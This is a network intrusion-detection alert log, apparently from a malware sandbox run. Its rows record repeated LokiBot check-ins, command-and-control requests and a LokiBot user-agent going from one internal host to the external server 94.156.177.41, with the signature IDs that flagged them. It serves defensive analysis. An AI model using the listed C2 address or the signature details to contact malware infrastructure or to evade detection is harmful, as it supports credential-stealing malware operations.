2025-01-11T07:45:45.428851+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50066	94.156.177.41	80	TCP
2025-01-11T07:45:45.428851+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50066	94.156.177.41	80	TCP
2025-01-11T07:45:45.593770+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50067	94.156.177.41	80	TCP
2025-01-11T07:45:45.593770+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50067	94.156.177.41	80	TCP
2025-01-11T07:45:45.593770+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50067	94.156.177.41	80	TCP
2025-01-11T07:45:46.295558+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50067	94.156.177.41	80	TCP
2025-01-11T07:45:46.295558+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50067	94.156.177.41	80	TCP
2025-01-11T07:45:46.450873+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50068	94.156.177.41	80	TCP
2025-01-11T07:45:46.450873+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50068	94.156.177.41	80	TCP
2025-01-11T07:45:46.450873+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50068	94.156.177.41	80	TCP
2025-01-11T07:45:47.180099+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50068	94.156.177.41	80	TCP
2025-01-11T07:45:47.180099+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50068	94.156.177.41	80	TCP
2025-01-11T07:45:47.341627+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50069	94.156.177.41	80	TCP
2025-01-11T07:45:47.341627+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50069	94.156.177.41	80	TCP
2025-01-11T07:45:47.341627+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50069	94.156.177.41	80	TCP
2025-01-11T07:45:48.062041+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50069	94.156.177.41	80	TCP
2025-01-11T07:45:48.062041+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50069	94.156.177.41	80	TCP
2025-01-11T07:45:48.223334+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50070	94.156.177.41	80	TCP
2025-01-11T07:45:48.223334+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50070	94.156.177.41	80	TCP
2025-01-11T07:45:48.223334+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50070	94.156.177.41	80	TCP
2025-01-11T07:45:48.926425+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50070	94.156.177.41	80	TCP
2025-01-11T07:45:48.926425+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50070	94.156.177.41	80	TCP
2025-01-11T07:45:49.103767+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50071	94.156.177.41	80	TCP
2025-01-11T07:45:49.103767+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50071	94.156.177.41	80	TCP
2025-01-11T07:45:49.103767+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50071	94.156.177.41	80	TCP
2025-01-11T07:45:49.824114+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50071	94.156.177.41	80	TCP
2025-01-11T07:45:49.824114+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50071	94.156.177.41	80	TCP
2025-01-11T07:45:49.999889+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50072	94.156.177.41	80	TCP
2025-01-11T07:45:49.999889+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50072	94.156.177.41	80	TCP
2025-01-11T07:45:49.999889+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50072	94.156.177.41	80	TCP
2025-01-11T07:45:50.734862+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50072	94.156.177.41	80	TCP
2025-01-11T07:45:50.734862+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50072	94.156.177.41	80	TCP
2025-01-11T07:45:50.897746+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50073	94.156.177.41	80	TCP
2025-01-11T07:45:50.897746+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50073	94.156.177.41	80	TCP
2025-01-11T07:45:50.897746+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50073	94.156.177.41	80	TCP
2025-01-11T07:45:51.619631+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50073	94.156.177.41	80	TCP
2025-01-11T07:45:51.619631+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50073	94.156.177.41	80	TCP
2025-01-11T07:45:51.767772+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50074	94.156.177.41	80	TCP
2025-01-11T07:45:51.767772+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50074	94.156.177.41	80	TCP
2025-01-11T07:45:51.767772+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50074	94.156.177.41	80	TCP
2025-01-11T07:45:52.455714+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50074	94.156.177.41	80	TCP
2025-01-11T07:45:52.455714+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50074	94.156.177.41	80	TCP
2025-01-11T07:45:52.610435+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50075	94.156.177.41	80	TCP
2025-01-11T07:45:52.610435+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50075	94.156.177.41	80	TCP
2025-01-11T07:45:52.610435+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50075	94.156.177.41	80	TCP
2025-01-11T07:45:53.300650+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50075	94.156.177.41	80	TCP
2025-01-11T07:45:53.300650+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50075	94.156.177.41	80	TCP
2025-01-11T07:45:53.849528+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50076	94.156.177.41	80	TCP
2025-01-11T07:45:53.849528+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50076	94.156.177.41	80	TCP
2025-01-11T07:45:53.849528+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50076	94.156.177.41	80	TCP
2025-01-11T07:45:54.576109+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50076	94.156.177.41	80	TCP
2025-01-11T07:45:54.576109+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50076	94.156.177.41	80	TCP
2025-01-11T07:45:54.733799+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50077	94.156.177.41	80	TCP
2025-01-11T07:45:54.733799+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50077	94.156.177.41	80	TCP
2025-01-11T07:45:54.733799+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50077	94.156.177.41	80	TCP
2025-01-11T07:45:55.483384+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50077	94.156.177.41	80	TCP
2025-01-11T07:45:55.483384+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50077	94.156.177.41	80	TCP
2025-01-11T07:45:55.638595+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50078	94.156.177.41	80	TCP
2025-01-11T07:45:55.638595+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50078	94.156.177.41	80	TCP
2025-01-11T07:45:55.638595+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50078	94.156.177.41	80	TCP
2025-01-11T07:45:56.355282+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50078	94.156.177.41	80	TCP
2025-01-11T07:45:56.355282+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50078	94.156.177.41	80	TCP
2025-01-11T07:45:56.514453+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50079	94.156.177.41	80	TCP
2025-01-11T07:45:56.514453+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50079	94.156.177.41	80	TCP
2025-01-11T07:45:56.514453+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50079	94.156.177.41	80	TCP
2025-01-11T07:45:57.212131+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50079	94.156.177.41	80	TCP
2025-01-11T07:45:57.212131+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50079	94.156.177.41	80	TCP
2025-01-11T07:45:57.364760+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50080	94.156.177.41	80	TCP
2025-01-11T07:45:57.364760+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50080	94.156.177.41	80	TCP
2025-01-11T07:45:57.364760+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50080	94.156.177.41	80	TCP
2025-01-11T07:45:58.216432+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50080	94.156.177.41	80	TCP
2025-01-11T07:45:58.216432+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50080	94.156.177.41	80	TCP
2025-01-11T07:45:58.382542+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50081	94.156.177.41	80	TCP
2025-01-11T07:45:58.382542+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50081	94.156.177.41	80	TCP
2025-01-11T07:45:58.382542+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50081	94.156.177.41	80	TCP
2025-01-11T07:45:59.120917+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50081	94.156.177.41	80	TCP
2025-01-11T07:45:59.120917+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50081	94.156.177.41	80	TCP
2025-01-11T07:45:59.299658+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50082	94.156.177.41	80	TCP
2025-01-11T07:45:59.299658+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50082	94.156.177.41	80	TCP
2025-01-11T07:45:59.299658+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50082	94.156.177.41	80	TCP
2025-01-11T07:45:59.986914+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50082	94.156.177.41	80	TCP
2025-01-11T07:45:59.986914+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50082	94.156.177.41	80	TCP
2025-01-11T07:46:00.145771+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50083	94.156.177.41	80	TCP
2025-01-11T07:46:00.145771+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50083	94.156.177.41	80	TCP
2025-01-11T07:46:00.145771+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50083	94.156.177.41	80	TCP
2025-01-11T07:46:00.838213+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50083	94.156.177.41	80	TCP
2025-01-11T07:46:00.838213+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50083	94.156.177.41	80	TCP
2025-01-11T07:46:00.982126+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50084	94.156.177.41	80	TCP
2025-01-11T07:46:00.982126+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50084	94.156.177.41	80	TCP
2025-01-11T07:46:00.982126+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50084	94.156.177.41	80	TCP
2025-01-11T07:46:01.716963+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50084	94.156.177.41	80	TCP
2025-01-11T07:46:01.716963+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50084	94.156.177.41	80	TCP
2025-01-11T07:46:01.873444+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50085	94.156.177.41	80	TCP
2025-01-11T07:46:01.873444+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50085	94.156.177.41	80	TCP
2025-01-11T07:46:01.873444+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50085	94.156.177.41	80	TCP
2025-01-11T07:46:02.579117+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50085	94.156.177.41	80	TCP
2025-01-11T07:46:02.579117+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50085	94.156.177.41	80	TCP
2025-01-11T07:46:02.873702+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50086	94.156.177.41	80	TCP
2025-01-11T07:46:02.873702+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50086	94.156.177.41	80	TCP
2025-01-11T07:46:02.873702+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50086	94.156.177.41	80	TCP
2025-01-11T07:46:03.569616+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50086	94.156.177.41	80	TCP
2025-01-11T07:46:03.569616+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50086	94.156.177.41	80	TCP
2025-01-11T07:46:03.722760+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50087	94.156.177.41	80	TCP
2025-01-11T07:46:03.722760+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50087	94.156.177.41	80	TCP
2025-01-11T07:46:03.722760+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50087	94.156.177.41	80	TCP
2025-01-11T07:46:04.429247+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50087	94.156.177.41	80	TCP
2025-01-11T07:46:04.429247+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50087	94.156.177.41	80	TCP
2025-01-11T07:46:04.607701+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50088	94.156.177.41	80	TCP
2025-01-11T07:46:04.607701+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50088	94.156.177.41	80	TCP
2025-01-11T07:46:04.607701+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50088	94.156.177.41	80	TCP
2025-01-11T07:46:05.309228+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50088	94.156.177.41	80	TCP
2025-01-11T07:46:05.309228+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50088	94.156.177.41	80	TCP
2025-01-11T07:46:05.489996+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50089	94.156.177.41	80	TCP
2025-01-11T07:46:05.489996+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50089	94.156.177.41	80	TCP
2025-01-11T07:46:05.489996+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50089	94.156.177.41	80	TCP
2025-01-11T07:46:06.196145+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50089	94.156.177.41	80	TCP
2025-01-11T07:46:06.196145+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50089	94.156.177.41	80	TCP
2025-01-11T07:46:06.353603+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50090	94.156.177.41	80	TCP
2025-01-11T07:46:06.353603+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50090	94.156.177.41	80	TCP
2025-01-11T07:46:06.353603+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50090	94.156.177.41	80	TCP
2025-01-11T07:46:07.103223+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50090	94.156.177.41	80	TCP
2025-01-11T07:46:07.103223+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50090	94.156.177.41	80	TCP
2025-01-11T07:46:07.255437+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50091	94.156.177.41	80	TCP
2025-01-11T07:46:07.255437+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50091	94.156.177.41	80	TCP
2025-01-11T07:46:07.255437+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50091	94.156.177.41	80	TCP
2025-01-11T07:46:07.967380+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50091	94.156.177.41	80	TCP
2025-01-11T07:46:07.967380+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50091	94.156.177.41	80	TCP
2025-01-11T07:46:08.138322+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50092	94.156.177.41	80	TCP
2025-01-11T07:46:08.138322+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50092	94.156.177.41	80	TCP
2025-01-11T07:46:08.138322+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50092	94.156.177.41	80	TCP
2025-01-11T07:46:08.856365+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50092	94.156.177.41	80	TCP
2025-01-11T07:46:08.856365+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50092	94.156.177.41	80	TCP
2025-01-11T07:46:09.033339+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50093	94.156.177.41	80	TCP
2025-01-11T07:46:09.033339+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50093	94.156.177.41	80	TCP
2025-01-11T07:46:09.033339+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50093	94.156.177.41	80	TCP
2025-01-11T07:46:09.756222+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50093	94.156.177.41	80	TCP
2025-01-11T07:46:09.756222+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50093	94.156.177.41	80	TCP
2025-01-11T07:46:09.910608+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50094	94.156.177.41	80	TCP
2025-01-11T07:46:09.910608+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50094	94.156.177.41	80	TCP
2025-01-11T07:46:09.910608+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50094	94.156.177.41	80	TCP
2025-01-11T07:46:10.621993+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50094	94.156.177.41	80	TCP
2025-01-11T07:46:10.621993+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50094	94.156.177.41	80	TCP
2025-01-11T07:46:10.798044+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50095	94.156.177.41	80	TCP
2025-01-11T07:46:10.798044+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50095	94.156.177.41	80	TCP
2025-01-11T07:46:10.798044+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50095	94.156.177.41	80	TCP
2025-01-11T07:46:11.520963+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50095	94.156.177.41	80	TCP
2025-01-11T07:46:11.520963+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50095	94.156.177.41	80	TCP
2025-01-11T07:46:11.690985+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50096	94.156.177.41	80	TCP
2025-01-11T07:46:11.690985+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50096	94.156.177.41	80	TCP
2025-01-11T07:46:11.690985+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50096	94.156.177.41	80	TCP
2025-01-11T07:46:12.414303+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50096	94.156.177.41	80	TCP
2025-01-11T07:46:12.414303+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50096	94.156.177.41	80	TCP
2025-01-11T07:46:12.563647+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50097	94.156.177.41	80	TCP
2025-01-11T07:46:12.563647+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50097	94.156.177.41	80	TCP
2025-01-11T07:46:12.563647+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50097	94.156.177.41	80	TCP
2025-01-11T07:46:13.286242+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50097	94.156.177.41	80	TCP
2025-01-11T07:46:13.286242+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50097	94.156.177.41	80	TCP
2025-01-11T07:46:13.437852+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50098	94.156.177.41	80	TCP
2025-01-11T07:46:13.437852+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50098	94.156.177.41	80	TCP
2025-01-11T07:46:13.437852+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50098	94.156.177.41	80	TCP
2025-01-11T07:46:14.163375+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50098	94.156.177.41	80	TCP
2025-01-11T07:46:14.163375+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50098	94.156.177.41	80	TCP
2025-01-11T07:46:14.311717+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50099	94.156.177.41	80	TCP
2025-01-11T07:46:14.311717+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50099	94.156.177.41	80	TCP
2025-01-11T07:46:14.311717+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50099	94.156.177.41	80	TCP
2025-01-11T07:46:15.040084+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50099	94.156.177.41	80	TCP
2025-01-11T07:46:15.040084+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50099	94.156.177.41	80	TCP
2025-01-11T07:46:15.196451+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50100	94.156.177.41	80	TCP
2025-01-11T07:46:15.196451+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50100	94.156.177.41	80	TCP
2025-01-11T07:46:15.196451+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50100	94.156.177.41	80	TCP
2025-01-11T07:46:15.899908+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50100	94.156.177.41	80	TCP
2025-01-11T07:46:15.899908+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50100	94.156.177.41	80	TCP
2025-01-11T07:46:16.066977+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50101	94.156.177.41	80	TCP
2025-01-11T07:46:16.066977+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50101	94.156.177.41	80	TCP
2025-01-11T07:46:16.066977+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50101	94.156.177.41	80	TCP
2025-01-11T07:46:16.788672+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50101	94.156.177.41	80	TCP
2025-01-11T07:46:16.788672+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50101	94.156.177.41	80	TCP
2025-01-11T07:46:16.947180+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50102	94.156.177.41	80	TCP
2025-01-11T07:46:16.947180+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50102	94.156.177.41	80	TCP
2025-01-11T07:46:16.947180+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50102	94.156.177.41	80	TCP
2025-01-11T07:46:17.639411+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50102	94.156.177.41	80	TCP
2025-01-11T07:46:17.639411+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50102	94.156.177.41	80	TCP
2025-01-11T07:46:17.795814+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50103	94.156.177.41	80	TCP
2025-01-11T07:46:17.795814+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50103	94.156.177.41	80	TCP
2025-01-11T07:46:17.795814+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50103	94.156.177.41	80	TCP
2025-01-11T07:46:18.636150+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50103	94.156.177.41	80	TCP
2025-01-11T07:46:18.636150+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50103	94.156.177.41	80	TCP
2025-01-11T07:46:18.795869+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50104	94.156.177.41	80	TCP
2025-01-11T07:46:18.795869+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50104	94.156.177.41	80	TCP
2025-01-11T07:46:18.795869+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50104	94.156.177.41	80	TCP
2025-01-11T07:46:19.502502+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50104	94.156.177.41	80	TCP
2025-01-11T07:46:19.502502+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50104	94.156.177.41	80	TCP
2025-01-11T07:46:19.678030+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50105	94.156.177.41	80	TCP
2025-01-11T07:46:19.678030+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50105	94.156.177.41	80	TCP
2025-01-11T07:46:19.678030+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50105	94.156.177.41	80	TCP
2025-01-11T07:46:20.387384+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50105	94.156.177.41	80	TCP
2025-01-11T07:46:20.387384+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50105	94.156.177.41	80	TCP
2025-01-11T07:46:20.545406+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50106	94.156.177.41	80	TCP
2025-01-11T07:46:20.545406+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50106	94.156.177.41	80	TCP
2025-01-11T07:46:20.545406+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50106	94.156.177.41	80	TCP
2025-01-11T07:46:21.299723+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50106	94.156.177.41	80	TCP
2025-01-11T07:46:21.299723+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50106	94.156.177.41	80	TCP
